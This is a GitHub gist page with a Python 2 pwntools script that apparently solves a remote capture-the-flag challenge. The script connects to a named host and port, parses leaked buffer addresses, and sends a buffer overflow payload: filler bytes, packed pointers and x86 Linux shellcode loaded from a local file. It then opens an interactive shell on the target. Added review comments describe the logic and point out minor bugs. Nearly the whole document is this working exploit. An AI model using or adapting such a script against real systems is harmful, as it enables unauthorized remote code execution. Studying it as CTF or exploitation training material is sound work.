m---/www.py Secret

Last active August 29, 2015 14:17
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save m---/029c8827c12a24506270 to your computer and use it in GitHub Desktop.
Save m---/029c8827c12a24506270 to your computer and use it in GitHub Desktop.
# coding: utf-8
# Python 2 script (note the `print` statement near the end); the payload is
# assembled by concatenating str values and struct.pack() output, which
# does not type-check under Python 3.
import os
import sys
import time
import re
import struct
import pwn
# os, sys and time are imported but not referenced below.
# Remote endpoint the script connects to (values as given in the script).
host = 'www.termsec.net'
port = 17284
# Pack one unsigned 32-bit integer, little-endian.
p = lambda x: struct.pack('<I', x)
s = pwn.remote(host, port)
# The first thing read from the socket is expected to contain two hex
# addresses ("buffers at 0x... and 0x..."). Everything sent later is
# computed from that disclosure; a service that does not announce its
# buffer addresses leaves nothing here to compute from.
result = s.recv()
matches = re.search('buffers at (0x[0-9a-f]+) and (0x[0-9a-f]+)', result)
# NOTE(review): `matches` is None when the banner does not match the
# pattern, and the next line then fails with AttributeError rather than a
# clear message. ptr_str2 is parsed and logged but never used afterwards.
ptr_str1 = int(matches.group(1), 16)
ptr_str2 = int(matches.group(2), 16)
pwn.log.info('str1: 0x%x, str2: 0x%x' % (ptr_str1, ptr_str2))
# First message: 45 filler bytes, three packed 32-bit values (one constant,
# two offsets from the leaked first address), then the raw contents of a
# local file named 'x86-linux-sh', padded with 'B' to 200 bytes in total.
# What the constant 0x8049d08 refers to cannot be determined from this file.
# NOTE(review): the handle returned by open() is never closed, and if the
# assembled payload already exceeds 200 bytes the padding expression is
# negative and adds nothing, so the 200-byte length is not actually enforced.
payload = ('A' * 45) + p(0x8049d08) + p(ptr_str1 + 45 + 8) + p(ptr_str1 + 45 + 12) + open('x86-linux-sh', 'rb').read()
payload += 'B' * (200 - len(payload))
# Second message: a single packed 32-bit constant.
payload2 = p(0xdeedbeef)
s.send(payload + "\n")
s.send(payload2 + "\n")
print s.recv()
s.interactive()